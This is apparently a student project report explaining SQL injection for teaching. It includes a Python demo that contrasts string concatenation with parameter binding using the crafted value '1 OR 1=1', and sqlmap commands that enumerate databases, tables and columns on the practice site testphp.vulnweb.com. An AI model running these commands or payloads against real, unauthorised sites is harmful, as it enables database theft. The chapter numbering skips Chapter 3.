
CHAPTER 1

INTRODUCTION

1.1

Introduction

This project examines security threats that can arise on a network. There are many tricks and techniques for stealing data over the internet; one of them is SQL injection. SQL injection is yet another common vulnerability that is the result of lax input validation. Unlike cross-site scripting vulnerabilities, which are ultimately directed at your site's visitors, SQL injection is an attack on the site itself, in particular its database. The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that's eventually executed by the database. The insidious query may attempt any number of actions, from retrieving alternate data to modifying or removing information from the database.

1.2

Problem Background

As mentioned in the introduction, SQL injection is a kind of threat that exists in computer networks. The objective of SQL injection is to retrieve the information available in a given network. Hackers and other users will try to expose that information and use it for their own purposes. The existing problems so far are:

1. The data can be misused by hackers.
2. Privacy may no longer belong to the original owner.

1.3

Objective

o To study the existing methods used by others to disseminate information from the internet.
o To run a program that can be used for SQL injection methods.
o To evaluate the existing programs that are available on the internet.

1.4

Project Aims

The aim of this project is to produce something that students or other users can use to get information and to understand how SQL injection works and how it can be a threat to the network.

1.5

Scope

The scope is websites running on the internet.

CHAPTER 2

LITERATURE REVIEW

2.1

Introduction

This chapter discusses the topics related to the field of the project. Knowing this information and how the application will function is very important. The literature review covers research on the features, theories and limitations that can be found, and it will be used as a compass in the application development process later on. All the information considered important will be collected, followed by a study of the existing application, so that it provides a better picture and more ideas about how it works.

2.2

Introduction to Databases

A database is a structured collection of data. The data are typically organized to model relevant aspects of reality (for example, the availability of rooms in hotels), in a way that supports processes requiring this information (for example, finding a hotel with vacancies). The term database is correctly applied to the data and their supporting data structures, and not to the database management system (DBMS). The data collection together with its DBMS is called a database system. The term database system implies that the data are managed to some level of quality (measured in terms of accuracy, availability, usability, and resilience), and this in turn often implies the use of a general-purpose database management system (DBMS). A general-purpose DBMS is typically a complex software system that meets many usage requirements to properly maintain its databases, which are often large and complex.

2.3

SQL (Structured Query Language)

SQL is a kind of programming language specialized for managing data in a relational database management system (RDBMS). It is used to communicate with a database. SQL statements are used to perform tasks such as updating data in a database or retrieving data from it.

2.4

SQLMap

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws on a site and taking over database servers; it is equipped with a detection engine for this purpose. In this topic we explain how this is done and demonstrate the process of getting the database fingerprint, finding the database name and current user, enumerating databases, and enumerating tables and columns.

2.5

SQL Injection

SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
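The difference between constructing a statement from a request value and binding that value, as an added example that is not part of the original report. It assumes a `products` table and a `cat` parameter modelled on the listing page tested in Chapter 4, uses constructed sample rows, and runs on SQLite instead of SQL Server so that it works offline.

```python
import sqlite3

def make_db():
    """In-memory catalogue with constructed sample rows (not data from the report)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT)")
    db.executemany(
        "INSERT INTO products (cat, name) VALUES (?, ?)",
        [(1, "poster"), (1, "print"), (2, "frame"), (3, "internal price list")],
    )
    return db

def list_products_concat(db, cat):
    """Pattern to look for in review: the request value becomes part of the SQL text."""
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def list_products_bound(db, cat):
    """Binding only: the value is compared as data and never parsed as SQL."""
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (cat,))]

def list_products_safe(db, cat):
    """Input validation plus binding: reject anything that is not a plain integer."""
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(cat),))]

if __name__ == "__main__":
    db = make_db()
    benign, crafted = "1", "1 OR 1=1"  # constructed request values
    print("concat, benign :", list_products_concat(db, benign))
    print("concat, crafted:", list_products_concat(db, crafted))  # filter is bypassed
    print("bound,  crafted:", list_products_bound(db, crafted))   # no category matches
    print("safe,   benign :", list_products_safe(db, benign))
    try:
        list_products_safe(db, crafted)
    except ValueError as err:
        print("safe,   crafted: rejected:", err)
```

With the concatenated statement the crafted value changes the `WHERE` clause and every category is returned; with the bound statement the same value is an ordinary string that matches no category.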

CHAPTER 4

PROGRAM TESTING

4.1

Introduction

This chapter explains every step that will be carried out in order to get the information and learn the differences before reaching the conclusions.

4.2

Testing

These are a few steps for testing the program, that is, SQL injection against one website.

Database Fingerprint

    sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

Finding the database name and current user

    sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db --current-user

Enumerate Databases

    sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Enumerate Databases and Tables and Columns

    sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables --columns
